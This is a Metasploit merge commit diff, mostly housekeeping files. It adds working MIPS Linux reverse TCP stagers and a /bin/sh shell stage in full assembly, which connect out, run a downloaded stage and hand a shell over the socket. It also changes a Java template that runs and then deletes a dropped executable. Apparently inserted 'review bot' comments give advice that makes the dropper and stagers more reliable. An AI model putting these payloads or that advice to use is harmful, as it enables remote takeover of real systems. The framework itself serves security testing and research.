Merge remote-tracking branch 'upstream/master' into enum_ad_perf

bug/bundler_fix
Meatballs 2014-01-21 21:00:51 +00:00
commit 720f892e2f
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
267 changed files with 9209 additions and 4624 deletions


@ -2,6 +2,7 @@ bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
@ -13,14 +14,16 @@ jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
# Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at
@ -72,9 +75,18 @@ OJ <oj@github> OJ Reeves <oj@buffered.io>
OJ <oj@github> OJ <oj@buffered.io>
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
Rick Flores <0xnanoquetz9l@gmail.com> Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane
schierlm <schierlm@github> Michael Schierl <schierlm@gmx.de> # Aka mihi
scriptjunkie <scriptjunkie@github> Matt Weeks <scriptjunkie@scriptjunkie.us>
skape <skape@???> Matt Miller <mmiller@hick.org>
spoonm <spoonm@github> Spoon M <spoonm@gmail.com>
swtornio <swtornio@github> Steve Tornio <swtornio@gmail.com>
Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
TrustedSec <davek@trustedsec.com> trustedsec <davek@trustedsec.com>
# Aliases for utility author names. Since they're fake, typos abound
Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>


@ -1,11 +1,13 @@
language: ruby
before_install:
- rake --version
- sudo apt-get update -qq
- sudo apt-get install -qq libpcap-dev
before_script:
- cp config/database.yml.travis config/database.yml
- rake db:create
- rake db:migrate
- bundle exec rake --version
- bundle exec rake db:create
- bundle exec rake db:migrate
rvm:
#- '1.8.7'


@ -19,7 +19,7 @@ group :db do
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.6'
gem 'metasploit_data_models', '~> 0.16.9'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
end


@ -22,7 +22,7 @@ GEM
fivemat (1.2.1)
i18n (0.6.5)
json (1.8.0)
metasploit_data_models (0.16.6)
metasploit_data_models (0.16.9)
activerecord (>= 3.2.13)
activesupport
pg
@ -67,7 +67,7 @@ DEPENDENCIES
factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json
metasploit_data_models (~> 0.16.6)
metasploit_data_models (~> 0.16.9)
msgpack
network_interface (~> 0.0.1)
nokogiri

LICENSE

@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
2007 H D Moore <hdm [at] metasploit.com>
License: GPL-2 and Artistic
Files: external/source/meterpreter/ReflectiveDLLInjection/*
Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
Files: external/source/ReflectiveDLLInjection/*
Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
License: BSD-3-clause
Files: external/source/meterpreter/source/common/queue.h
Copyright: 1991, 1993 The Regents of the University of California
License: BSD-3-clause
Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
License: Zlib
Files: external/source/meterpreter/source/bionic/libc/*
Copyright: 2005-2008, The Android Open Source Project
2004 by Internet Systems Consortium, Inc. ("ISC")
1995,1996,1999 by Internet Software Consortium
1995 by International Business Machines, Inc.
1997,1998,1999,2004 The NetBSD Foundation, Inc.
1993 Christopher G. Demetriou
1983,1985,1989,1993 The Regents of the University of California
2000 Ben Harris
1995,1996,1997,1998 WIDE Project
2003 Networks Associates Technology, Inc.
1993 by Digital Equipment Corporation
1997 Mark Brinicombe
1993 Martin Birgmeier
1993 by Sun Microsystems, Inc.
1997, 2005 Todd C. Miller <Todd.Miller@courtesan.com>
1995, 1996 Carnegie-Mellon University
2003 Networks Associates Technology, Inc.
License: BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/bionic/libdl/*
Copyright: 2007 The Android Open Source Project
License: BSD-3-clause
Files: external/source/meterpreter/source/bionic/libm/*
Copyright: 2003, Steven G. Kargl
2003 Mike Barcroft <mike@FreeBSD.org>
2002-2005 David Schultz <das@FreeBSD.ORG>
2004 Stefan Farfeleder
2003 Dag-Erling Coïdan Smørgrav
1996 The NetBSD Foundation, Inc.
1985,1988,1991,1992,1993 The Regents of the University of California
1993,94 Winning Strategies, Inc.
1993, 2004 by Sun Microsystems, Inc.
License: BSD-2-clause and BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/extensions/espia/screen.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
Copyright: 2005 Vincent Liu
License: GPL-2
Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
Copyright: 2010, patrickHVE@googlemail.com
License: BSD-2-clause
Files: external/source/meterpreter/source/pssdk/*
Copyright: microOLAP
License: N/A
Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
SDK library embedded into the Meterpreter Sniffer extension. This
source code is not distributed with Metasploit Framework.
Files: external/source/meterpreter/source/openssl/*
Copyright: 1998-2002 The OpenSSL Project
License: OpenSSL and SSLeay
Files: external/source/meterpreter/source/server/posix/sfsyscall.h
Copyright: 2003 Philippe Biondi <biondi@cartel-securite.fr>
License: LGPL
Files: external/source/meterpreter/source/jpeg-8/*
Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
License: BSD-3-clause
Files: external/source/meterpreter/source/libpcap/*
Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
License: BSD-4-clause
Files: external/source/metsvc/*
Copyright: 2007, Determina Inc.
License: BSD-3-clause



@ -158,15 +158,10 @@ class STDProcessBuffer(threading.Thread):
self.data_lock = threading.RLock()
def run(self):
while self.is_alive():
byte = self.std.read(1)
for byte in iter(lambda: self.std.read(1), ''):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
data = self.std.read()
self.data_lock.acquire()
self.data += data
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
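Review bot: Both loop variants in this hunk wrap `self.data += byte` in a bare `self.data_lock.acquire()` / `self.data_lock.release()` pair with no try/finally, so any exception raised in between leaves the RLock held and every later caller of `is_read_ready` or the reader side blocks for good; `with self.data_lock: self.data += byte` gives the same exclusion and always releases. The new `iter(lambda: self.std.read(1), '')` form stops only when read() returns the str sentinel `''`; if `self.std` is a binary stream under Python 3 it yields `b''` at EOF, which never compares equal to `''`, and the loop would spin on zero-length reads — worth confirming which stream type is assigned to `self.std`, since that assignment is outside this hunk. The rendered hunk has lost its old/new markers, so the lock point applies to whichever of the two loops is the surviving one.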



@ -39,11 +39,13 @@
if (%{var_proc}.waitFor() == 0) {
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
}
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
}
else
}
else
{
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
String[] %{var_exepatharray} = new String[1];
%{var_exepatharray}[0] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
}
%%>
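Review bot: The `else` branch now hands the path to `Runtime.exec` as a one-element `String[]`, which stops the `String` overload from tokenizing `%{var_exepath}` on whitespace, but the branch above it still calls `Runtime.getRuntime().exec(%{var_exepath})` on the line after `waitFor() == 0`, so a dropped executable under a path containing a space still fails there. Use the same form in both branches: `%{var_proc} = Runtime.getRuntime().exec(new String[]{ %{var_exepath} });`. If the `File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();` line is on the new side, note that `delete()`'s boolean is discarded, so a leftover payload on disk goes unreported. The enclosing `if`/`else` and the earlier declaration of `%{var_proc}` start before this hunk.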


data/vncdll.x86.dll Executable file



@ -1,15 +1 @@
OPTS="-x .ut.rb -x .ts.rb -x samples -q"
BASE="$(dirname "$0")"
MSFDIR="${BASE}/.."
DOCDIR="${BASE}/api"
doc=$(which sdoc)
if [ -z $doc ]; then
doc=$(which rdoc)
fi
echo "Using ${doc} for doc generation"
echo "Putting docs in ${DOCDIR}"
$doc $OPTS -t "Metasploit Documentation" -o ${DOCDIR} ${MSFDIR}/lib/rex ${MSFDIR}/lib/msf
rake yard


@ -70,7 +70,8 @@
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
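Review bot: Appending `exit 0` to the post-build command makes the event report success even when `editbin.exe` is missing or fails, so a DLL that never received the `/OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0` stamp is shipped as a clean build and the mismatch only surfaces on the target host. If the intent is to tolerate an absent editbin, gate the call instead of masking every failure, e.g. `where editbin.exe >NUL 2>&1 &amp;&amp; editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL`, or at least leave a comment in the project file recording why the exit status is discarded. The project this belongs to is not named in the rendered section; from the neighbouring files it is presumably the vncdll build.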


@ -0,0 +1,152 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store


@ -0,0 +1,75 @@
##
#
# Name: stage_tcp_shell
# Type: Stage
# Qualities: Compatible with both mips little and big endian
# Platforms: Linux
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
# License:
#
# This file is part of the Metasploit Exploit Framework
# and is subject to the same licenses and copyrights as
# the rest of this package.
#
# Description:
#
# This payload duplicates stdio, stdin and stderr to a file descriptor,
# stored on $s2, and executes /bin/sh.
#
# Assemble and create a relocatable object with:
# as -o stage_tcp_shell.o stage_tcp_shell.s
#
# Assemble, link and create an executable ELF with:
# gcc -o stage_tcp_shell stage_tcp_shell.s
#
# The tool "tools/metasm_shell.rb" can be used to easily
# generate the string to place on:
# modules/payloads/stages/linux/mipsle/shell.rb
# and:
# modules/payloads/stages/linux/mipsbe/shell.rb
##
.text
.align 2
.globl main
.set nomips16
main:
.set noreorder
.set nomacro
# dup2(sockfd, 2)
# dup2(sockfd, 1)
# dup2(sockfd, 0)
# a0: oldfd (sockfd)
# a1: newfd (2, 1, 0)
# v0: syscall = __NR_dup2 (4063)
li $s1, -3
nor $s1, $s1, $zero
add $a0, $s2, $zero
dup2_loop:
add $a1, $s1, $zero # dup2_loop
li $v0, 4063 # sys_dup2
syscall 0x40404
li $s0, -1
addi $s1, $s1, -1
bne $s1, $s0, dup2_loop # <dup2_loop>
# execve("/bin/sh", ["/bin/sh"], NULL)
# a0: filename "/bin/sh"
# a1: argv ["/bin/sh", NULL]
# a2: envp NULL
# v0: syscall = __NR_dup2 (4011)
li $t8, -1 # load t8 with -1
getaddr: # getaddr trick from scut@team-teso.net
bltzal $t8, getaddr # branch with $ra stored if t8 < 0
slti $t8, $zero, -1 # delay slot instr: $t8 = 0 (see below)
addi $a0, $ra, 28 # $ra gets this address
sw $a0, -8($sp)
sw $zero, -4($sp)
addi $a1, $sp, -8
slti $a2, $zero,-1
li $v0, 4011 # sys_execve
syscall 0x40404
.string "/bin/sh"
.set macro
.set reorder
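Review bot: The execve block's header names the wrong syscall: `# v0: syscall = __NR_dup2 (4011)` should be `# v0: syscall = __NR_execve (4011)`, matching `li $v0, 4011 # sys_execve` below it. The Description says the payload duplicates "stdio, stdin and stderr", but the dup2 loop runs over newfd 2, 1, 0, i.e. stderr, stdout and stdin — `# This payload dup2()s the socket in $s2 onto stderr, stdout and stdin and execs /bin/sh`. The `addi $a0, $ra, 28` offset is right for the seven instructions between the bltzal delay slot and the `.string "/bin/sh"`, but nothing documents that dependency; `# 7 instructions * 4 bytes from $ra to the "/bin/sh" literal - keep in sync if code is inserted` would stop a later edit from silently pointing execve at garbage. The `License:` field in the header is empty.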


@ -0,0 +1,127 @@
##
#
# Name: stager_sock_reverse
# Type: Stager
# Qualities: No Nulls out of the IP / Port data
# Platforms: Linux MIPS Big Endian
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
# License:
#
# This file is part of the Metasploit Exploit Framework
# and is subject to the same licenses and copyrights as
# the rest of this package.
#
# Description:
#
# Implementation of a MIPS BE Linux reverse TCP stager.
#
# File descriptor in $s2.
#
# Assemble and create a relocatable object with:
# as -o stager_sock_reverse.o stager_sock_reverse.s
#
# Assemble, link and create an executable ELF with:
# gcc -o stager_sock_reverse stager_sock_reverse.s
#
# The tool "tools/metasm_shell.rb" can be used to easily
# generate the string to place on:
# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
##
.text
.align 2
.globl main
.set nomips16
main:
.set noreorder
.set nomacro
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
# a0: domain = PF_INET (2)
# a1: type = SOCK_STREAM (2)
# a2: protocol = IPPROTO_IP (0)
# v0: syscall = __NR_socket (4183)
li $t7, -6
nor $t7, $t7, $zero
addi $a0, $t7, -3
addi $a1, $t7, -3
slti $a2, $zero, -1
li $v0, 4183
syscall 0x40404
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
# a0: sockfd
# a1: addr = AF_INET (2)
# a2: addrlen = 16
# v0: syscall = __NR_connect (4170)
lw $a0, -4($sp)
li $t7, -3
nor $t7, $t7, $zero
sw $t7, -32($sp)
lui $t6, 0x115c
sw $t6, -28($sp)
lui $t6, 0x7f00 # ip
ori $t6, $t6, 0x0001 # ip
sw $t6, -26($sp)
addiu $a1, $sp, -30
li $t4, -17
nor $a2, $t4, $zero
li $v0, 4170
syscall 0x40404
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
# a0: addr = -1
# a1: lenght = 4096
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1
# sp(20): offset = 0
# v0: syscall = __NR_mmap (4090)
li $a0, -1
li $a1, 4097
addi $a1, $a1, -1
li $t1, -8
nor $t1, $t1, $0
add $a2, $t1, $0
li $a3, 2050
li $t3, -22
nor $t3, $t3, $zero
add $t3, $sp, $t3
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
li $v0, 4090
syscall 0x40404
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
# read(sockfd, addr, 4096)
# a0: sockfd
# a1: addr
# a2: len = 4096
# v0: syscall = __NR_read (4003)
lw $a0, -4($sp)
lw $a1, -8($sp)
li $a2, 4097
addi $a2, $a2, -1
li $v0, 4003
syscall 0x40404
# cacheflush(addr, nbytes, DCACHE)
# a0: addr
# a1: nbytes
# a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147)
lw $a0, -8($sp)
add $a1, $v0, $zero
li $t1, -3
nor $t1, $t1, $0
add $a2, $t1, $0
li $v0, 4147
syscall 0x40404
# jmp to the stage
lw $s1, -8($sp)
lw $s2, -4($sp)
jalr $s1
.set macro
.set reorder
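Review bot: The connect() comment does not describe the code under it: it names `inet_addr("192.168.172.1")` while `lui $t6, 0x7f00` / `ori $t6, $t6, 0x0001` store 0x7f000001 (127.0.0.1), and `a1: addr = AF_INET (2)` where `$a1` is actually the sockaddr pointer from `addiu $a1, $sp, -30`; since the header says this is pasted into the mipsbe reverse_tcp module, the placeholder words should be called out, e.g. `# port (0x115c = 4444) and ip (0x7f000001) are placeholders, presumably patched by the module`. `sw $2, -5($t3)` passes `$v0`, which still holds connect()'s return value, as mmap's fd rather than the `-1` the `sp(16): fd = -1` comment claims; Linux ignores fd for MAP_ANONYMOUS so it works, but the comment should say so rather than state a value the code never loads. `sw $t6, -26($sp)` is a 4-byte store to a 2-byte-aligned address (assuming the usual 8-byte-aligned $sp), which relies on the kernel's unaligned-access emulation and costs a trap per store — worth a comment if it is deliberate. The cacheflush block is labelled `__NR_read (4147)` instead of `__NR_cacheflush (4147)`, and `lenght` is a typo.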


@ -0,0 +1,127 @@
##
#
# Name: stager_sock_reverse
# Type: Stager
# Qualities: No Nulls out of the IP / Port data
# Platforms: Linux MIPS Little Endian
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
# License:
#
# This file is part of the Metasploit Exploit Framework
# and is subject to the same licenses and copyrights as
# the rest of this package.
#
# Description:
#
# Implementation of a MIPS LE Linux reverse TCP stager.
#
# File descriptor in $s2.
#
# Assemble and create a relocatable object with:
# as -o stager_sock_reverse.o stager_sock_reverse.s
#
# Assemble, link and create an executable ELF with:
# gcc -o stager_sock_reverse stager_sock_reverse.s
#
# The tool "tools/metasm_shell.rb" can be used to easily
# generate the string to place on:
# modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
##
.text
.align 2
.globl main
.set nomips16
main:
.set noreorder
.set nomacro
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
# a0: domain = PF_INET (2)
# a1: type = SOCK_STREAM (2)
# a2: protocol = IPPROTO_IP (0)
# v0: syscall = __NR_socket (4183)
li $t7, -6
nor $t7, $t7, $zero
addi $a0, $t7, -3
addi $a1, $t7, -3
slti $a2, $zero, -1
li $v0, 4183
syscall 0x40404
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
# a0: sockfd
# a1: addr = AF_INET (2)
# a2: addrlen = 16
# v0: syscall = __NR_connect (4170)
lw $a0, -4($sp)
li $t7, -3
nor $t7, $t7, $zero
sw $t7, -30($sp)
ori $t6, $zero, 0x5c11 # port
sw $t6, -28($sp)
lui $t6, 0x100 # ip
ori $t6, $t6, 0x7f # ip
sw $t6, -26($sp)
addiu $a1, $sp, -30
li $t4, -17
nor $a2, $t4, $zero
li $v0, 4170
syscall 0x40404
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
# a0: addr = -1
# a1: lenght = 4096
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1
# sp(20): offset = 0
# v0: syscall = __NR_mmap (4090)
li $a0, -1
li $a1, 4097
addi $a1, $a1, -1
li $t1, -8
nor $t1, $t1, $0
add $a2, $t1, $0
li $a3, 2050
li $t3, -22
nor $t3, $t3, $zero
add $t3, $sp, $t3
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
li $v0, 4090
syscall 0x40404
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
# read(sockfd, addr, 4096)
# a0: sockfd
# a1: addr
# a2: len = 4096
# v0: syscall = __NR_read (4003)
lw $a0, -4($sp)
lw $a1, -8($sp)
li $a2, 4097
addi $a2, $a2, -1
li $v0, 4003
syscall 0x40404
# cacheflush(addr, nbytes, DCACHE)
# a0: addr
# a1: nbytes
# a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147)
lw $a0, -8($sp)
add $a1, $v0, $zero
li $t1, -3
nor $t1, $t1, $0
add $a2, $t1, $0
li $v0, 4147
syscall 0x40404
# jmp to the stage
lw $s1, -8($sp)
lw $s2, -4($sp) # sockfd saved on $s2
jalr $s1
.set macro
.set reorder
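Review bot: The stage is fetched with a single `read(sockfd, addr, 4096)` and control is transferred with `jalr $s1` without checking `$v0`, so a stage that arrives in more than one TCP segment, exceeds one page, or a read that fails after a failed connect (the `connect` result is never tested either) is executed truncated or from untouched mmap memory; the shell stage is small enough for this to work, but a `# single read: stage must fit in 4096 bytes and arrive in one segment` comment would record the limit for anyone reusing the stager. `sw $t7, -30($sp)` and `sw $t6, -26($sp)` are word stores to 2-byte-aligned addresses when $sp is 8-byte aligned, so they depend on the kernel's unaligned-access fixup; document that or the nulls-avoidance reason for the layout. The connect() comment still advertises `inet_addr("192.168.172.1")` while the code builds 0x0100007f (127.0.0.1 little-endian) via `lui $t6, 0x100` / `ori $t6, $t6, 0x7f`, and the cacheflush block is labelled `__NR_read (4147)` where `__NR_cacheflush (4147)` is meant.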

external/source/vncdll/.gitignore vendored Normal file

@ -0,0 +1,152 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store


@ -1,131 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "LoadLibraryR.h"
//===============================================================================================//
DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{
WORD wIndex = 0;
PIMAGE_SECTION_HEADER pSectionHeader = NULL;
PIMAGE_NT_HEADERS pNtHeaders = NULL;
pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
if( dwRva < pSectionHeader[0].PointerToRawData )
return dwRva;
for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
